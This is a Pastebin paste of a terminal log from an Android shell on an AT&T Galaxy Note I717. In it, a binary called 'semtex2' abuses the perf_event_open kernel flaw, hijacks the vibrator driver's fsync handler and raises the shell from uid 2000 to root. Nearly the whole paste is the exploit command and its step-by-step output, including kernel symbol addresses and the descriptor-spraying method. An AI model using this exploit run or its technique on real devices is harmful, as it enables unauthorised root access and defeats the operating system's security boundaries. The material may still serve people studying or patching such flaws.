Guest User

perf_event_open exploit AT&T ICS Galaxy Note I717

a guest
Jul 9th, 2013
354
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. shell@android:/ $ id
  2. uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)
  3. shell@android:/ $ /data/local/tmp/bin/uname -a
  4. Linux localhost 3.0.8-perf-I717UCLF6-CL773414 #1 SMP PREEMPT Sat Jun 23 20:21:19 KST 2012 armv7l GNU/Linux
  5. shell@android:/ $ /data/local/tmp/semtex2 "sh -i"
  6. main() located @ 0x8fb8, END() @ 0x979c: 2020 bytes (0x7e4)
  7. commit_creds() @ 0xc01ccf78
  8. prepare_kernel_cred() @ 0xc01cd670
  9. no ptmx_fops symbol for hi-jacking fsync()
  10. using Samsung's vibrator kernel module fops
  11. Vibetonz_fops @ 0xbf000fc0
  12. fsync @ 0xbf000ff8
  13. no perf_swevent_enabled symbol. try finding it manually
  14. mmap memory region: 0x10000000 - 0x12000000
  15. clearing mmap region to detect perf_event exploit
  16. kernel base assumed at: 0xc0000000
  17. memory gap size: 1342177280 (0x50000000)
  18. target perf_swevent_enabled index: 0x14000000 (335544320)
  19. searching for change in mmap region...
  20. found change at addr: 0x1118fcc8 (1 - '')
  21. cleaning up perf_event_open file-descriptors
  22. perf_swevent_enabled is at: 0xc118fcc8
  23. # bytes from perf_swevent_enabled to reach fsync(): 0xfde71330 (-35187920)
  24. number of words being added to perf_swevent_enabled offset: 0x3f79c4cc (1064944844)
  25. 45056 FD's needed using 88 child processes (512 fd's/pid)
  26. sleeping to let the children catch up...
  27. mapping memory for exploit code at: 0xb000 - 0xc000
  28. opening /dev/tspdrv
  29. triggering file_ops.fsync()!
  30. shell@android:/ # id
  31. uid=0(root) gid=0(root)
  32. shell@android:/ # exit
  33. attempting to reap child proccesses...
  34. children killed... hopefully the kernel won't panic() :)
RAW Paste Data